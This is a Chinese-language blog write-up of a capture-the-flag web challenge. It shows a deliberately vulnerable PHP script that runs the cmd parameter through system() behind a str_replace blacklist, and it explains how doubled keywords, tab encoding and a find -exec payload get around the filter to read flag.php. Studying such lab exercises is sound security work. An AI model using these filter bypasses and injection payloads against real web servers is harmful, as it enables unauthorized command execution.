Web命令执行

文章分析了一个PHP代码示例,该代码存在Web远程命令执行(RCE)漏洞。通过检查GET参数cmd,当其非空时执行系统命令,但使用了黑名单和str_replace函数尝试阻止特定危险命令。然而,通过字符串双写、编码等方法,可以绕过限制,如使用find命令结合编码规避来读取flag.php的内容,从而实现命令执行。
摘要由CSDN通过智能技术生成

Web RCE

源代码

<?php 
if(isset($_GET['cmd'])){
        $cmd=$_GET['cmd'];
}else{
        show_source(__FILE__);
        die();
}
$blacklist = array(';', '|', '*', '?', '.', '&', '`', '%', '(', ')', 'cat', 'ls', 'flag',' ');
foreach ($blacklist as $word) {
    $cmd = str_replace($word, '', $cmd);
}
system($cmd);
?>

代码分析:

  • 判断cmd是否为空,然后返回网页源代码
  • blacklist是一个数组,里面的值,用来丢给str_replace函数进行替换操作
  • 如果cmd里面的值在blacklist里面,那么就会被替换为空

根据上面的分析我们可以得知,如果想要执行命令,我们需要绕过str_replace函数

像这种替换操作,如果是字符串我们正常可以双写绕过,我们先看看可以执行哪些命令

在这里插入图片描述
命令执行成功,那么我们使用ls看看当前目录下有什么文件,注意lsblacklist里面,所以要双写绕过一下
在这里插入图片描述
可以看到flag.php了,那么接下来肯定是需要查看它里面的文件内容了

常规查看命令:cat flag.php
从上面的blacklist里面,可以得知,cat,空格,flag,“.” 都被过滤了

  • cat 双写
  • 空格 %09(tab)
  • flag 双写
  • “.” 可以使用不指定文件名就可以查看文件内容的命令

最终payload

find%09/var/www/html%09-maxdepth%091%09-type%09f%09-exec%09cacatt%09{}%09\%2b

解码后的

find	/var/www/html	-maxdepth	1	-type	f	-exec	cacatt	{}	\+

本来这个命令是以;结尾的,但是被禁了,所以我们可以用+号代替(注意+一定要编码)

得到flag
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ten^v^

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值